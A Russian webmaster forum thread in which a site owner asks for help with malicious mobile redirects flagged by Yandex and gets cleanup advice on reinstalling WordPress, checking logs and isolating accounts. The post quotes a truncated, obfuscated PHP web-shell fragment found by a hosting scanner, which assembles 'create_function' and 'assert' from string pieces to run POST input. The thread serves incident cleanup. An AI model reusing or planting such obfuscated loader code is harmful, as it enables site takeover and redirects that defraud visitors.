- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Пришло "письмо счастья" от Яндекса, что мой сайт угрожает пользователям, пошел проверил в Яндекс Вебмастере и обнаружил фатальную ошибку:
Сайт использует методы, обманывающие пользователей мобильного интернета — например, подменяет проиндексированное поисковым роботом содержимое и/или перенаправляет посетителей на страницы с подпиской на платные контент-услуги.
Написал в поддержку и мне объяснили, что с мобильной версии сайта иногда происходит редирект на мошеннические сайты и мне необходимо устранить это и в течение 2-3 месяцев если все нормально снимут ограничения.
Очень долго вбивая в поиск запросы, которые ведут на мой сайт мне удалось поймать редирект:
Так же бывает заходишь и в другой раз уже другой редирект:
Бывает еще и другие цепочки сайтов.
Так же удалось поймать подобное еще на 4 своих сайтах(возможно это не предел).
Воспользовался встроенным антивирусом AI-Bolit на своем хостинге и обнаружил на многих сайтах следующее:
с таким вредоносным кодом:
cution_time',0);ini_set('display_errors',0);error_reporting(0);set_time_limit(0);$cret='unction';$cret='create_f'.$cret; $jQuery='sert';$jQuery='as'.$jQuery;$Libr="_ostp";$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3]);if(issУдалил везде этот файл, так же в папке были и еще какие-то непонятные файлы(которых нет на тех сайтах, где данный скрипт не был обнаружен) их я тоже удалил.
Решив, что проблему я устранил с редиректом, написал Яндексу и получил стандартную отписку, что если все хорошо, то в течение 2-3 месяцев метку снимут...
Сейчас обнаружил, что редирект никуда не исчез. Кто может подсказать в чем причина? Я так понимаю, причина не в этом вредоносном коде, который я обнаружил? Или в нем, но я не до конца что-то удалил?
я не до конца что-то удалил?
Именно так.
Именно так.
Можете подсказать, что необходимо удалить еще?
Без понятия. Всё индивидуально.
Удалив "вредоносный файл", Вы вряд ли устранили ту уязвимость, за счёт которой он там появился.
Можете подсказать, что необходимо удалить еще?
Процедура творческая.. Как правило, зараза одна не приходит..
Редирект мог остаться, например, на Вашем компьютере из-за кэша.. А, возможно, он никуда и не исчез.. Можно проверить наличие файла.. Или сайт повторно был заражён.. в том же месте.. или в другом..
Или.. =)
В общем, без обследования пациента сложно сказать.
Пришло "письмо счастья" от Яндекса, что мой сайт угрожает пользователям, пошел проверил в Яндекс Вебмастере и обнаружил фатальную ошибку:
Сайт использует методы, обманывающие пользователей мобильного интернета — например, подменяет проиндексированное поисковым роботом содержимое и/или перенаправляет посетителей на страницы с подпиской на платные контент-услуги.
Написал в поддержку и мне объяснили, что с мобильной версии сайта иногда происходит редирект на мошеннические сайты и мне необходимо устранить это и в течение 2-3 месяцев если все нормально снимут ограничения.
Очень долго вбивая в поиск запросы, которые ведут на мой сайт мне удалось поймать редирект:
Так же бывает заходишь и в другой раз уже другой редирект:
Бывает еще и другие цепочки сайтов.
Так же удалось поймать подобное еще на 4 своих сайтах(возможно это не предел).
Воспользовался встроенным антивирусом AI-Bolit на своем хостинге и обнаружил на многих сайтах следующее:
с таким вредоносным кодом:
cution_time',0);ini_set('display_errors',0);error_reporting(0);set_time_limit(0);$cret='unction';$cret='create_f'.$cret; $jQuery='sert';$jQuery='as'.$jQuery;$Libr="_ostp";$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3]);if(issУдалил везде этот файл, так же в папке были и еще какие-то непонятные файлы(которых нет на тех сайтах, где данный скрипт не был обнаружен) их я тоже удалил.
Решив, что проблему я устранил с редиректом, написал Яндексу и получил стандартную отписку, что если все хорошо, то в течение 2-3 месяцев метку снимут...
Сейчас обнаружил, что редирект никуда не исчез. Кто может подсказать в чем причина? Я так понимаю, причина не в этом вредоносном коде, который я обнаружил? Или в нем, но я не до конца что-то удалил?
Привет. Удалось решить проблему? Аналогичная проблема возникла и у меня
Привет. Удалось решить проблему? Аналогичная проблема возникла и у меня
Пока что не удалось
Обновляете все скрипты, т.е. удалить все, залить чистые вордпресс скрипты и плагины, чтоб на сервере точно ничего не оставалось.
Дальше наблюдаете и логи смотрите, чтоб по логам понять к каким скриптам было обращение для заливки нового шелла.
Можно поставить антибота из моей подписи, если обращения будут к самому движку, т.е. скрипту, который запрашивает конфиг вордпресса (в котором будет вставлен инклуд антибота), то тогда в логах антибота будет видны эти странные обращения и скорее всего попытка залить новый шелл не получится. Но если обращение будет напрямую к скрипту дырявого плагина, тогда уже конечно антибот не спасет.
Обновляете все скрипты, т.е. удалить все, залить чистые вордпресс скрипты и плагины, чтоб на сервере точно ничего не оставалось.
Дальше наблюдаете и логи смотрите, чтоб по логам понять к каким скриптам было обращение для заливки нового шелла.
Можно поставить антибота из моей подписи, если обращения будут к самому движку, т.е. скрипту, который запрашивает конфиг вордпресса (в котором будет вставлен инклуд антибота), то тогда в логах антибота будет видны эти странные обращения и скорее всего попытка залить новый шелл не получится. Но если обращение будет напрямую к скрипту дырявого плагина, тогда уже конечно антибот не спасет.
Спасибо за рекомендации. Попробую так сделать
Спасибо за рекомендации. Попробую так сделать
Этого мало (а антибот вообще никаким боком). Особенно с учётом
еще на 4 своих сайтах
Если они на не изолированных аккаунтах, то блокировать нужно все сразу и работать над всеми. Открывать после того, как все будут обработаны (или переносить по очереди на др. акки/хостинги.)
См. подробности https://ru.stackoverflow.com/questions/777029/%D0%92%D0%B8%D1%80%D1%83%D1%81%D1%8B-%D0%B2-wordpress/777040#777040
SeVlad, если взлом идет через скрипт который часть cms, когда есть шанс до дырявого скрипта проинклудить антибота, то антибот еще каким боком помогает, когда на сайте есть дыра, но скриптов столько, что фиг там что найдешь. Дыра не исчезнет, но использование ее хакерами сильно усложняется, у некоторых эта временная мера "пока найду дырку" затянулась на год и хакеры отвалились. Один так "спас" вордпресс, второй drupal, это только из известных мне случаев.
P.S. Но дырку все равно искать надо.
---------- Добавлено 14.04.2020 в 22:10 ----------
SeVlad, про 4 сайта - тогда вешать на всех антибота )))